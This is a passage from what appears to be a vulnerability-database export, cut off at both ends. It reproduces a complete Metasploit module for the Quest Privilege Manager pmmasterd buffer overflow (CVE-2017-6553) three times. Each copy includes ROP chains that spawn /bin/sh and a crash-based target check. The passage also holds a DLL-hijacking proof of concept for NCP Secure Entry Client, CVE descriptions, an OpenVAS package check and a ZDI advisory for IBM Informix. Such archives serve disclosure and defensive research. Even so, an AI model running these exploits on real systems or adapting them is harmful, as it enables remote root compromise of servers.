"type": "zdt", "title": "Quest Privilege Manager pmmasterd Buffer Overflow Exploit", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n\r\n include Exploit::Remote::Tcp\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Quest Privilege Manager pmmasterd Buffer Overflow',\r\n 'Description' => %q{\r\n This modules exploits a buffer overflow in the Quest Privilege Manager,\r\n a software used to integrate Active Directory with Linux and Unix\r\n systems. The vulnerability exists in the pmmasterd daemon, and can only\r\n triggered when the host has been configured as a policy server (\r\n Privilege Manager for Unix or Quest Sudo Plugin). A buffer overflow\r\n condition exists when handling requests of type ACT_ALERT_EVENT, where\r\n the size of a memcpy can be controlled by the attacker. This module\r\n only works against version < 6.0.0-27. Versions up to 6.0.0-50 are also\r\n vulnerable, but not supported by this module (a stack cookie bypass is\r\n required). NOTE: To use this module it is required to be able to bind a\r\n privileged port ( <=1024 ) as the server refuses connections coming\r\n from unprivileged ports, which in most situations means that root\r\n privileges are required.\r\n },\r\n 'Author' =>\r\n [\r\n 'm0t'\r\n ],\r\n 'References' =>\r\n [\r\n ['CVE', '2017-6553'],\r\n ['URL', 'https://0xdeadface.wordpress.com/2017/04/07/multiple-vulnerabilities-in-quest-privilege-manager-6-0-0-xx-cve-2017-6553-cve-2017-6554/']\r\n ],\r\n 'Payload' =>\r\n {\r\n 'Compat' =>\r\n {\r\n 'PayloadType' => 'cmd',\r\n 'RequiredCmd' => 'generic python perl ruby openssl bash-tcp'\r\n }\r\n },\r\n 'Arch' => ARCH_CMD,\r\n 'Platform' => 'unix',\r\n 'Targets' =>\r\n [\r\n ['Quest Privilege Manager pmmasterd 6.0.0-27 x64',\r\n {\r\n exploit: :exploit_x64,\r\n check: :check_x64\r\n }\r\n ],\r\n ['Quest Privilege Manager pmmasterd 6.0.0-27 x86',\r\n {\r\n exploit: :exploit_x86,\r\n check: :check_x86\r\n }\r\n ]\r\n ],\r\n 'Privileged' => true,\r\n 'DisclosureDate' => 'Apr 09 2017',\r\n 'DefaultTarget' => 0\r\n )\r\n )\r\n\r\n register_options(\r\n [\r\n Opt::RPORT(12345),\r\n Opt::CPORT(rand(1024))\r\n ]\r\n )\r\n end\r\n\r\n # definitely not stealthy! sends a crashing request, if the socket dies, or\r\n # the output is partial it assumes the target has crashed. Although the\r\n # daemon spawns a new process for each connection, the segfault will appear\r\n # on syslog\r\n def check\r\n unless respond_to?(target[:check], true)\r\n fail_with(Failure::NoTarget, \"Invalid target specified\")\r\n end\r\n\r\n send(target[:check])\r\n end\r\n\r\n def exploit\r\n unless respond_to?(target[:exploit], true)\r\n fail_with(Failure::NoTarget, \"Invalid target specified\")\r\n end\r\n\r\n request = send(target[:exploit])\r\n\r\n connect\r\n print_status(\"Sending trigger\")\r\n sock.put(request)\r\n sock.get_once\r\n print_status(\"Sending payload\")\r\n sock.put(payload.encoded)\r\n disconnect\r\n end\r\n\r\n # server should crash after parsing the packet, partial output is returned\r\n def check_x64\r\n head = [ 0x26c ].pack(\"N\")\r\n head << [ 0x700 ].pack(\"N\")\r\n head << [ 0x700 ].pack(\"N\")\r\n head << \"\\x00\" * 68\r\n\r\n body = \"PingE4.6 .0.0.27\"\r\n body << rand_text_alpha(3000)\r\n\r\n request = head + body\r\n\r\n connect\r\n print_status(\"Sending trigger\")\r\n sock.put(request)\r\n res = sock.timed_read(1024, 1)\r\n if res.match? \"Pong4$\"\r\n return Exploit::CheckCode::Appears\r\n else\r\n return Exploit::CheckCode::Unknown\r\n end\r\n end\r\n\r\n # server should crash while parsing the packet, with no output\r\n def check_x86\r\n head = [ 0x26c ].pack(\"N\")\r\n head << [ 0x700 ].pack(\"N\")\r\n head << [ 0x700 ].pack(\"N\")\r\n head << \"\\x00\" * 68\r\n\r\n body = rand_text_alpha(3000)\r\n\r\n request = head + body\r\n\r\n connect\r\n print_status(\"Sending trigger\")\r\n sock.put(request)\r\n begin\r\n sock.timed_read(1024, 1)\r\n return Exploit::CheckCode::Unknown\r\n rescue ::Exception\r\n return Exploit::CheckCode::Appears\r\n end\r\n end\r\n\r\n def exploit_x64\r\n head = [ 0x26c ].pack(\"N\")\r\n head << [ 0x700 ].pack(\"N\")\r\n head << [ 0x700 ].pack(\"N\")\r\n head << \"\\x00\" * 68\r\n\r\n # rop chain for pmmasterd 6.0.0.27 (which is compiled without -fPIE)\r\n ropchain = [\r\n 0x408f88, # pop rdi, ret\r\n 0x4FA215, # /bin/sh\r\n 0x40a99e, # pop rsi ; ret\r\n 0, # argv @rsi\r\n 0x40c1a0, # pop rax, ret\r\n 0, # envp @rax\r\n 0x48c751, # mov rdx, rax ; pop rbx ; mov rax, rdx ; ret\r\n 0xcacc013, # padding\r\n 0x408a98, # execve,\r\n 0\r\n ].pack(\"Q*\")\r\n\r\n body = \"PingE4.6 .0.0.27\" # this works if encryption is set to AES, which is default, changing E4 to E2 might make it work with DES\r\n body << rand_text_alpha(1600)\r\n body << ropchain\r\n body << rand_text_alpha(0x700 - body.size)\r\n\r\n head + body\r\n end\r\n\r\n def exploit_x86\r\n head = [ 0x26c ].pack(\"N\")\r\n head << [ 0x108 ].pack(\"N\")\r\n head << [ 0xcc ].pack(\"N\")\r\n head << \"\\x00\" * 68\r\n\r\n # rop chain for pmmasterd 6.0.0.27 (which is compiled without -fPIE)\r\n ropchain = [\r\n 0x8093262, # ret\r\n 0x73, # cs reg\r\n 0x804AE2C, # execve,\r\n 0xcacc013, # padding\r\n 0x8136CF0, # /bin/sh\r\n 0,\r\n 0\r\n ].pack(\"V*\")\r\n\r\n pivotback = 0x08141223 # sub esp, ebx ; retf\r\n writable = 0x81766f8 # writable loc\r\n\r\n body = \"PingE4.6 .0.0.27\" # this works if encryption is set to AES, which is default, changing E4 to E2 might make it work with DES\r\n body << rand_text_alpha(104)\r\n body << ropchain\r\n body << rand_text_alpha(0xb4 - body.size)\r\n body << [0x50].pack(\"V\")\r\n body << rand_text_alpha(0xc4 - body.size)\r\n body << [pivotback].pack(\"V\")\r\n body << [writable].pack(\"V\")\r\n body << rand_text_alpha(0x108 - body.size)\r\n\r\n head + body\r\n end\r\nend\n\n# 0day.today [2018-01-01] #", "sourceHref": "https://0day.today/exploit/27767", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-02T13:03:07", "bulletinFamily": "exploit", "description": "Exploit for windows platform in category local exploits", "modified": "2010-09-14T00:00:00", "published": "2010-09-14T00:00:00", "id": "1337DAY-ID-14075", "href": "https://0day.today/exploit/description/14075", "type": "zdt", "title": "NCP Secure Entry Client v.9.23.017 DLL Hijacking Exploit", "sourceData": "========================================================\r\nNCP Secure Entry Client v.9.23.017 DLL Hijacking Exploit \r\n========================================================\r\n\r\n/*\r\nExploit Title: NCP Secure Entry Client v.9.23.017 DLL Hijacking Exploit (conman.dll, dvccsabase002.dll, kmpapi32.dll, ncpmon2.dll)\r\nAuthor: Anastasios Monachos (secuid0) - anastasiosm[at]gmail[dot]com\r\nSoftware Version: NCP Secure Entry Client v.9.23.017\r\nVendor Site: http://www.ncp-e.com/\r\nDownload URL: http://www.ncp-e.com/en/downloadstatistik/secure-entry-client/ncp-secure-entry-client-released.html\r\nVulnerable Extensions: pcf, spd, wge, wgx\r\nTested Under: winxp_sp3.080413-2111\r\n\r\nInstructions: \r\n1. Compile the following code\r\n2. Create a file of the affected extensions in the same directory as the dll\r\n3. Execute file.<extension>\r\n*/\r\n\r\n#include <windows.h>\r\n#define DLLIMPORT __declspec (dllexport)\r\n\r\nint m0nk()\r\n{\r\n\tMessageBox(0, \"NCP Secure Entry Client v9.23.017 is vulnerable to DLL Hijacking\", \"secuid0\", MB_OK);\r\n\treturn 0;\r\n}\r\n\r\nBOOL APIENTRY DllMain(HMODULE hModule, DWORD m0nk_call,LPVOID lpReserved)\r\n{\r\n\tswitch (m0nk_call)\r\n\t{\r\n\tcase DLL_PROCESS_ATTACH:\r\n\t\tm0nk();\r\n\tcase DLL_THREAD_ATTACH:\r\n\tcase DLL_THREAD_DETACH:\r\n\tcase DLL_PROCESS_DETACH:\r\n\t\tbreak;\r\n\t}\r\n\treturn TRUE;\r\n}\r\n\r\n\n\n# 0day.today [2018-01-02] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/14075"}], "packetstorm": [{"lastseen": "2017-05-13T17:26:57", "bulletinFamily": "exploit", "description": "", "modified": "2017-05-13T00:00:00", "published": "2017-05-13T00:00:00", "href": "https://packetstormsecurity.com/files/142492/Quest-Privilege-Manager-pmmasterd-Buffer-Overflow.html", "id": "PACKETSTORM:142492", "title": "Quest Privilege Manager pmmasterd Buffer Overflow", "type": "packetstorm", "sourceData": "`## \n# This module requires Metasploit: http://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = NormalRanking \n \ninclude Exploit::Remote::Tcp \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Quest Privilege Manager pmmasterd Buffer Overflow', \n'Description' => %q{ \nThis modules exploits a buffer overflow in the Quest Privilege Manager, \na software used to integrate Active Directory with Linux and Unix \nsystems. The vulnerability exists in the pmmasterd daemon, and can only \ntriggered when the host has been configured as a policy server ( \nPrivilege Manager for Unix or Quest Sudo Plugin). A buffer overflow \ncondition exists when handling requests of type ACT_ALERT_EVENT, where \nthe size of a memcpy can be controlled by the attacker. This module \nonly works against version < 6.0.0-27. Versions up to 6.0.0-50 are also \nvulnerable, but not supported by this module (a stack cookie bypass is \nrequired). NOTE: To use this module it is required to be able to bind a \nprivileged port ( <=1024 ) as the server refuses connections coming \nfrom unprivileged ports, which in most situations means that root \nprivileges are required. \n}, \n'Author' => \n[ \n'm0t' \n], \n'References' => \n[ \n['CVE', '2017-6553'], \n['URL', 'https://0xdeadface.wordpress.com/2017/04/07/multiple-vulnerabilities-in-quest-privilege-manager-6-0-0-xx-cve-2017-6553-cve-2017-6554/'] \n], \n'Payload' => \n{ \n'Compat' => \n{ \n'PayloadType' => 'cmd', \n'RequiredCmd' => 'generic python perl ruby openssl bash-tcp' \n} \n}, \n'Arch' => ARCH_CMD, \n'Platform' => 'unix', \n'Targets' => \n[ \n['Quest Privilege Manager pmmasterd 6.0.0-27 x64', \n{ \nexploit: :exploit_x64, \ncheck: :check_x64 \n} \n], \n['Quest Privilege Manager pmmasterd 6.0.0-27 x86', \n{ \nexploit: :exploit_x86, \ncheck: :check_x86 \n} \n] \n], \n'Privileged' => true, \n'DisclosureDate' => 'Apr 09 2017', \n'DefaultTarget' => 0 \n) \n) \n \nregister_options( \n[ \nOpt::RPORT(12345), \nOpt::CPORT(rand(1024)) \n] \n) \nend \n \n# definitely not stealthy! sends a crashing request, if the socket dies, or \n# the output is partial it assumes the target has crashed. Although the \n# daemon spawns a new process for each connection, the segfault will appear \n# on syslog \ndef check \nunless respond_to?(target[:check], true) \nfail_with(Failure::NoTarget, \"Invalid target specified\") \nend \n \nsend(target[:check]) \nend \n \ndef exploit \nunless respond_to?(target[:exploit], true) \nfail_with(Failure::NoTarget, \"Invalid target specified\") \nend \n \nrequest = send(target[:exploit]) \n \nconnect \nprint_status(\"Sending trigger\") \nsock.put(request) \nsock.get_once \nprint_status(\"Sending payload\") \nsock.put(payload.encoded) \ndisconnect \nend \n \n# server should crash after parsing the packet, partial output is returned \ndef check_x64 \nhead = [ 0x26c ].pack(\"N\") \nhead << [ 0x700 ].pack(\"N\") \nhead << [ 0x700 ].pack(\"N\") \nhead << \"\\x00\" * 68 \n \nbody = \"PingE4.6 .0.0.27\" \nbody << rand_text_alpha(3000) \n \nrequest = head + body \n \nconnect \nprint_status(\"Sending trigger\") \nsock.put(request) \nres = sock.timed_read(1024, 1) \nif res.match? \"Pong4$\" \nreturn Exploit::CheckCode::Appears \nelse \nreturn Exploit::CheckCode::Unknown \nend \nend \n \n# server should crash while parsing the packet, with no output \ndef check_x86 \nhead = [ 0x26c ].pack(\"N\") \nhead << [ 0x700 ].pack(\"N\") \nhead << [ 0x700 ].pack(\"N\") \nhead << \"\\x00\" * 68 \n \nbody = rand_text_alpha(3000) \n \nrequest = head + body \n \nconnect \nprint_status(\"Sending trigger\") \nsock.put(request) \nbegin \nsock.timed_read(1024, 1) \nreturn Exploit::CheckCode::Unknown \nrescue ::Exception \nreturn Exploit::CheckCode::Appears \nend \nend \n \ndef exploit_x64 \nhead = [ 0x26c ].pack(\"N\") \nhead << [ 0x700 ].pack(\"N\") \nhead << [ 0x700 ].pack(\"N\") \nhead << \"\\x00\" * 68 \n \n# rop chain for pmmasterd 6.0.0.27 (which is compiled without -fPIE) \nropchain = [ \n0x408f88, # pop rdi, ret \n0x4FA215, # /bin/sh \n0x40a99e, # pop rsi ; ret \n0, # argv @rsi \n0x40c1a0, # pop rax, ret \n0, # envp @rax \n0x48c751, # mov rdx, rax ; pop rbx ; mov rax, rdx ; ret \n0xcacc013, # padding \n0x408a98, # execve, \n0 \n].pack(\"Q*\") \n \nbody = \"PingE4.6 .0.0.27\" # this works if encryption is set to AES, which is default, changing E4 to E2 might make it work with DES \nbody << rand_text_alpha(1600) \nbody << ropchain \nbody << rand_text_alpha(0x700 - body.size) \n \nhead + body \nend \n \ndef exploit_x86 \nhead = [ 0x26c ].pack(\"N\") \nhead << [ 0x108 ].pack(\"N\") \nhead << [ 0xcc ].pack(\"N\") \nhead << \"\\x00\" * 68 \n \n# rop chain for pmmasterd 6.0.0.27 (which is compiled without -fPIE) \nropchain = [ \n0x8093262, # ret \n0x73, # cs reg \n0x804AE2C, # execve, \n0xcacc013, # padding \n0x8136CF0, # /bin/sh \n0, \n0 \n].pack(\"V*\") \n \npivotback = 0x08141223 # sub esp, ebx ; retf \nwritable = 0x81766f8 # writable loc \n \nbody = \"PingE4.6 .0.0.27\" # this works if encryption is set to AES, which is default, changing E4 to E2 might make it work with DES \nbody << rand_text_alpha(104) \nbody << ropchain \nbody << rand_text_alpha(0xb4 - body.size) \nbody << [0x50].pack(\"V\") \nbody << rand_text_alpha(0xc4 - body.size) \nbody << [pivotback].pack(\"V\") \nbody << [writable].pack(\"V\") \nbody << rand_text_alpha(0x108 - body.size) \n \nhead + body \nend \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/142492/quest_pmmasterd_bof.rb.txt", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "cve": [{"lastseen": "2017-08-13T10:43:42", "bulletinFamily": "NVD", "description": "Buffer Overflow in Quest One Identity Privilege Manager for Unix before 6.0.0.061 allows remote attackers to obtain full access to the policy server via an ACT_ALERT_EVENT request that causes memory corruption in the pmmasterd daemon.", "modified": "2017-08-12T21:29:21", "published": "2017-04-29T12:59:00", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-6553", "id": "CVE-2017-6553", "title": "CVE-2017-6553", "type": "cve", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-05-25T17:51:16", "bulletinFamily": "NVD", "description": "pmmasterd in Quest Privilege Manager before 6.0.0.061, when configured as a policy server, allows remote attackers to write to arbitrary files and consequently execute arbitrary code with root privileges via an ACT_NEWFILESENT action.", "modified": "2017-05-23T21:29:04", "published": "2017-04-14T14:59:00", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-6554", "id": "CVE-2017-6554", "type": "cve", "title": "CVE-2017-6554", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "metasploit": [{"lastseen": "2019-04-06T09:59:39", "bulletinFamily": "exploit", "description": "This modules exploits a buffer overflow in the Quest Privilege Manager, a software used to integrate Active Directory with Linux and Unix systems. The vulnerability exists in the pmmasterd daemon, and can only triggered when the host has been configured as a policy server ( Privilege Manager for Unix or Quest Sudo Plugin). A buffer overflow condition exists when handling requests of type ACT_ALERT_EVENT, where the size of a memcpy can be controlled by the attacker. This module only works against version < 6.0.0-27. Versions up to 6.0.0-50 are also vulnerable, but not supported by this module (a stack cookie bypass is required). NOTE: To use this module it is required to be able to bind a privileged port ( <=1024 ) as the server refuses connections coming from unprivileged ports, which in most situations means that root privileges are required.", "modified": "2017-08-18T05:19:09", "published": "2017-04-05T16:59:54", "id": "MSF:EXPLOIT/LINUX/MISC/QUEST_PMMASTERD_BOF", "href": "", "type": "metasploit", "title": "Quest Privilege Manager pmmasterd Buffer Overflow", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Quest Privilege Manager pmmasterd Buffer Overflow',\n 'Description' => %q{\n This modules exploits a buffer overflow in the Quest Privilege Manager,\n a software used to integrate Active Directory with Linux and Unix\n systems. The vulnerability exists in the pmmasterd daemon, and can only\n triggered when the host has been configured as a policy server (\n Privilege Manager for Unix or Quest Sudo Plugin). A buffer overflow\n condition exists when handling requests of type ACT_ALERT_EVENT, where\n the size of a memcpy can be controlled by the attacker. This module\n only works against version < 6.0.0-27. Versions up to 6.0.0-50 are also\n vulnerable, but not supported by this module (a stack cookie bypass is\n required). NOTE: To use this module it is required to be able to bind a\n privileged port ( <=1024 ) as the server refuses connections coming\n from unprivileged ports, which in most situations means that root\n privileges are required.\n },\n 'Author' =>\n [\n 'm0t'\n ],\n 'References' =>\n [\n ['CVE', '2017-6553'],\n ['URL', 'https://0xdeadface.wordpress.com/2017/04/07/multiple-vulnerabilities-in-quest-privilege-manager-6-0-0-xx-cve-2017-6553-cve-2017-6554/']\n ],\n 'Payload' =>\n {\n 'Compat' =>\n {\n 'PayloadType' => 'cmd_interact',\n 'ConnectionType' => 'find'\n }\n },\n 'Arch' => ARCH_CMD,\n 'Platform' => 'unix',\n 'Targets' =>\n [\n ['Quest Privilege Manager pmmasterd 6.0.0-27 x64',\n {\n exploit: :exploit_x64,\n check: :check_x64\n }\n ],\n ['Quest Privilege Manager pmmasterd 6.0.0-27 x86',\n {\n exploit: :exploit_x86,\n check: :check_x86\n }\n ]\n ],\n 'Privileged' => true,\n 'DisclosureDate' => 'Apr 09 2017',\n 'DefaultTarget' => 0\n )\n )\n\n register_options(\n [\n Opt::RPORT(12345),\n Opt::CPORT(rand(1024))\n ]\n )\n end\n\n # definitely not stealthy! sends a crashing request, if the socket dies, or\n # the output is partial it assumes the target has crashed. Although the\n # daemon spawns a new process for each connection, the segfault will appear\n # on syslog\n def check\n unless respond_to?(target[:check], true)\n fail_with(Failure::NoTarget, \"Invalid target specified\")\n end\n\n send(target[:check])\n end\n\n def exploit\n unless respond_to?(target[:exploit], true)\n fail_with(Failure::NoTarget, \"Invalid target specified\")\n end\n\n request = send(target[:exploit])\n\n connect\n print_status(\"Sending trigger\")\n sock.put(request)\n sock.get_once\n handler(sock)\n disconnect\n end\n\n # server should crash after parsing the packet, partial output is returned\n def check_x64\n head = [ 0x26c ].pack(\"N\")\n head << [ 0x700 ].pack(\"N\")\n head << [ 0x700 ].pack(\"N\")\n head << \"\\x00\" * 68\n\n body = \"PingE4.6 .0.0.27\"\n body << rand_text_alpha(3000)\n\n request = head + body\n\n connect\n print_status(\"Sending trigger\")\n sock.put(request)\n res = sock.timed_read(1024, 1)\n if res.match? \"Pong4$\"\n return Exploit::CheckCode::Appears\n else\n return Exploit::CheckCode::Unknown\n end\n end\n\n # server should crash while parsing the packet, with no output\n def check_x86\n head = [ 0x26c ].pack(\"N\")\n head << [ 0x700 ].pack(\"N\")\n head << [ 0x700 ].pack(\"N\")\n head << \"\\x00\" * 68\n\n body = rand_text_alpha(3000)\n\n request = head + body\n\n connect\n print_status(\"Sending trigger\")\n sock.put(request)\n begin\n sock.timed_read(1024, 1)\n return Exploit::CheckCode::Unknown\n rescue ::Exception\n return Exploit::CheckCode::Appears\n end\n end\n\n def exploit_x64\n head = [ 0x26c ].pack(\"N\")\n head << [ 0x700 ].pack(\"N\")\n head << [ 0x700 ].pack(\"N\")\n head << \"\\x00\" * 68\n\n # rop chain for pmmasterd 6.0.0.27 (which is compiled without -fPIE)\n ropchain = [\n 0x408f88, # pop rdi, ret\n 0x4FA215, # /bin/sh\n 0x40a99e, # pop rsi ; ret\n 0, # argv @rsi\n 0x40c1a0, # pop rax, ret\n 0, # envp @rax\n 0x48c751, # mov rdx, rax ; pop rbx ; mov rax, rdx ; ret\n 0xcacc013, # padding\n 0x408a98, # execve,\n 0\n ].pack(\"Q*\")\n\n body = \"PingE4.6 .0.0.27\" # this works if encryption is set to AES, which is default, changing E4 to E2 might make it work with DES\n body << rand_text_alpha(1600)\n body << ropchain\n body << rand_text_alpha(0x700 - body.size)\n\n head + body\n end\n\n def exploit_x86\n head = [ 0x26c ].pack(\"N\")\n head << [ 0x108 ].pack(\"N\")\n head << [ 0xcc ].pack(\"N\")\n head << \"\\x00\" * 68\n\n # rop chain for pmmasterd 6.0.0.27 (which is compiled without -fPIE)\n ropchain = [\n 0x8093262, # ret\n 0x73, # cs reg\n 0x804AE2C, # execve,\n 0xcacc013, # padding\n 0x8136CF0, # /bin/sh\n 0,\n 0\n ].pack(\"V*\")\n\n pivotback = 0x08141223 # sub esp, ebx ; retf\n writable = 0x81766f8 # writable loc\n\n body = \"PingE4.6 .0.0.27\" # this works if encryption is set to AES, which is default, changing E4 to E2 might make it work with DES\n body << rand_text_alpha(104)\n body << ropchain\n body << rand_text_alpha(0xb4 - body.size)\n body << [0x50].pack(\"V\")\n body << rand_text_alpha(0xc4 - body.size)\n body << [pivotback].pack(\"V\")\n body << [writable].pack(\"V\")\n body << rand_text_alpha(0x108 - body.size)\n\n head + body\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/quest_pmmasterd_bof.rb"}], "openvas": [{"lastseen": "2018-09-28T18:24:20", "bulletinFamily": "scanner", "description": "Oracle Linux Local Security Checks ELSA-2008-0364", "modified": "2018-09-28T00:00:00", "published": "2015-10-08T00:00:00", "id": "OPENVAS:1361412562310122583", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310122583", "title": "Oracle Linux Local Check: ELSA-2008-0364", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2008-0364.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.122583\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-08 14:48:37 +0300 (Thu, 08 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2008-0364\");\n script_tag(name:\"insight\", value:\"ELSA-2008-0364 - mysql security and bug fix update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2008-0364\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2008-0364.html\");\n script_cve_id(\"CVE-2006-7232\", \"CVE-2007-1420\", \"CVE-2007-2583\", \"CVE-2007-2691\", \"CVE-2007-2692\", \"CVE-2007-3781\", \"CVE-2007-3782\", \"CVE-2006-0903\", \"CVE-2006-4031\", \"CVE-2006-4227\");\n script_tag(name:\"cvss_base\", value:\"6.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux5\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux5\")\n{\n if ((res = isrpmvuln(pkg:\"mysql\", rpm:\"mysql~5.0.45~7.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"mysql-bench\", rpm:\"mysql-bench~5.0.45~7.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"mysql-devel\", rpm:\"mysql-devel~5.0.45~7.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"mysql-server\", rpm:\"mysql-server~5.0.45~7.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"mysql-test\", rpm:\"mysql-test~5.0.45~7.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:39", "bulletinFamily": "software", "description": "ZDI-11-050: IBM Informix Dynamic Server SET ENVIRONMENT Remote Code Execution Vulnerability\r\n\r\nhttp://www.zerodayinitiative.com/advisories/ZDI-11-050\r\n\r\nFebruary 7, 2011 - This vulnerability is being disclosed publicly without a patch in accordance with the ZDI 180 day deadline. To view mitigations for this vulnerability please see:\r\nhttp://dvlabs.tippingpoint.com/blog/2011/02/07/zdi-disclosure-ibm\r\n\r\n-- CVSS:\r\n10, (AV:N/AC:L/Au:N/C:C/I:C/A:C)\r\n\r\n-- Affected Vendors:\r\nIBM\r\n\r\n-- Affected Products:\r\nIBM Informix\r\n\r\n-- TippingPoint(TM) IPS Customer Protection:\r\nTippingPoint IPS customers have been protected against this\r\nvulnerability by Digital Vaccine protection filter ID 6553. \r\nFor further product information on the TippingPoint IPS, visit:\r\n\r\n http://www.tippingpoint.com\r\n\r\n-- Vulnerability Details:\r\nThis vulnerability allows remote attackers to execute arbitrary code on\r\nvulnerable installations of IBM Informix Database Server. SQL query\r\nexecution privileges are required to exploit this vulnerability.\r\n\r\nThe specific flaw exists within the oninit process bound to TCP port\r\n9088 when processing the arguments to the USELASTCOMMITTED option in a\r\nSQL query. User-supplied data is copied into a stack-based buffer\r\nwithout proper bounds checking resulting in an exploitable overflow.\r\nExploitation can result in arbitrary code execution under the context of\r\nthe database server.\r\n\r\n-- Disclosure Timeline:\r\n2008-11-10 - Vulnerability reported to vendor\r\n2011-02-07 - Public release of advisory\r\n\r\n-- Credit:\r\nThis vulnerability was discovered by:\r\n * Anonymous\r\n\r\n-- About the Zero Day Initiative (ZDI):\r\nEstablished by TippingPoint, The Zero Day Initiative (ZDI) represents \r\na best-of-breed model for rewarding security researchers for responsibly\r\ndisclosing discovered vulnerabilities.\r\n\r\nResearchers interested in getting paid for their security research\r\nthrough the ZDI can find more information and sign-up at:\r\n\r\n http://www.zerodayinitiative.com\r\n\r\nThe ZDI is unique in how the acquired vulnerability information is\r\nused. TippingPoint does not re-sell the vulnerability details or any\r\nexploit code. Instead, upon notifying the affected product vendor,\r\nTippingPoint provides its customers with zero day protection through\r\nits intrusion prevention technology. Explicit details regarding the\r\nspecifics of the vulnerability are not exposed to any parties until\r\nan official vendor patch is publicly available. Furthermore, with the\r\naltruistic aim of helping to secure a broader user base, TippingPoint\r\nprovides this vulnerability information confidentially to security\r\nvendors (including competitors) who have a vulnerability protection or\r\nmitigation product.\r\n\r\nOur vulnerability disclosure policy is available online at:\r\n\r\n http://www.zerodayinitiative.com/advisories/disclosure_policy/\r\n\r\nFollow the ZDI on Twitter:\r\n\r\n http://twitter.com/thezdi", "modified": "2011-02-15T00:00:00", "published": "2011-02-15T00:00:00", "id": "SECURITYVULNS:DOC:25735", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:25735", "title": "ZDI-11-050: IBM Informix Dynamic Server SET ENVIRONMENT Remote Code Execution Vulnerability", "type": "securityvulns", "cvss": {"score": 0.0, "vector": 